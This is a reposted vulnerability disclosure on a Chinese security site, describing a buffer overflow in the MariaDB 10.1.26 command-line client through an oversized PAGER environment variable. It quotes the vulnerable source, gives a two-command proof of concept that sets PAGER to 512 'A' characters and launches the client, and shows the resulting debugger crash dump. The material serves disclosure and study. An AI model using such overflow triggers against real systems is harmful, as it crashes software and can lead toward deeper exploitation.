首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MariaDB Client 10.1.26 - Denial of Service (PoC)
来源:vfocus.net 作者:strider 发布时间:2018-11-27  
# Exploit Title: MariaDB Client 10.1.26 - Denial of Service (PoC)
# Google Dork: None
# Date: 2018-11-16
# Exploit Author: strider
# Software Link: https://github.com/MariaDB/server
# Version: mysql  Ver 15.1 Distrib 10.1.26-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
# Tested on: Debian 9 Stretch x64 / Ubuntu 18.04 x86_64
# CVE : None
 
# Description:
# MariaDB uses environment variables. The PAGER variable is vulnerable to a bufferoverflow.
# If the environment variable PAGER is greater or equals 512 characters it will crash and make client unusable.
 
# This is caused by a the function strmov which takes all from source and copy that
# into destination which have a fixed size.
 
Codepart:
static char default_pager[FN_REFLEN];
 
char *tmp=getenv("PAGER");
if (tmp && strlen(tmp))
{
    default_pager_set= 1;
    strmov(default_pager, tmp);
}
 
 
Proof of Concept:
 
Step 1:
 
export PAGER=$(python -c "print '\x41' * 512")
 
Step 2:
 
mariadb -u user -p
 
Crash
 
---------------------------------------------------------------------
peda output:
 
Program received signal SIGSEGV, Segmentation fault.
 
[----------------------------------registers-----------------------------------]
RAX: 0x555555b73600 ('A' <repeats 200 times>...)
RBX: 0x555555b7cbc8 ('A' <repeats 200 times>...)
RCX: 0x70 ('p')
RDX: 0x0
RSI: 0x555555bafe40 ('A' <repeats 200 times>...)
RDI: 0x555555bb0040
RBP: 0x7fffffffdfa0 --> 0x555555639a80 (<__libc_csu_init>: push   r15)
RSP: 0x7fffffffdd48 --> 0x55555558e5bc (<main+620>:    mov    rax,QWORD PTR [r12])
RIP: 0x7ffff677e2e6 (<__strcpy_sse2_unaligned+374>:   movdqu XMMWORD PTR [rdi-0x40],xmm4)
R8 : 0x555555b92580 ('A' <repeats 200 times>...)
R9 : 0x20 (' ')
R10: 0x7fffffffa5a0 --> 0x7fffffffa5d0 --> 0x7fffffffdb80 --> 0x7fffffffdc10 --> 0x0
R11: 0x7ffff6846d68 --> 0xfff37778fff37768
R12: 0x555555b00bc0 --> 0x555555b00b80 --> 0x40000000 ('')
R13: 0x7ffff6a846e8 --> 0x7ffff6a84600 --> 0xfbad2084
R14: 0x0
R15: 0x0
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Xorg X11 Server SUID Privilege
·ELBA5 5.8.0 - Remote Code Exec
·macOS 10.13 - 'workq_kernretur
·Arm Whois 3.11 - Buffer Overfl
·ImageMagick - Memory Leak
·Netgear Unauthenticated Remote
·Microsoft Edge Chakra OP_Memse
·Cisco WebEx Meetings Privilege
·XMPlay 3.8.3 Denial Of Service
·TeamCity Agent XML-RPC Command
·HTML Video Player 1.2.5 Buffer
·Mac OS X libxpc MITM Privilege
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved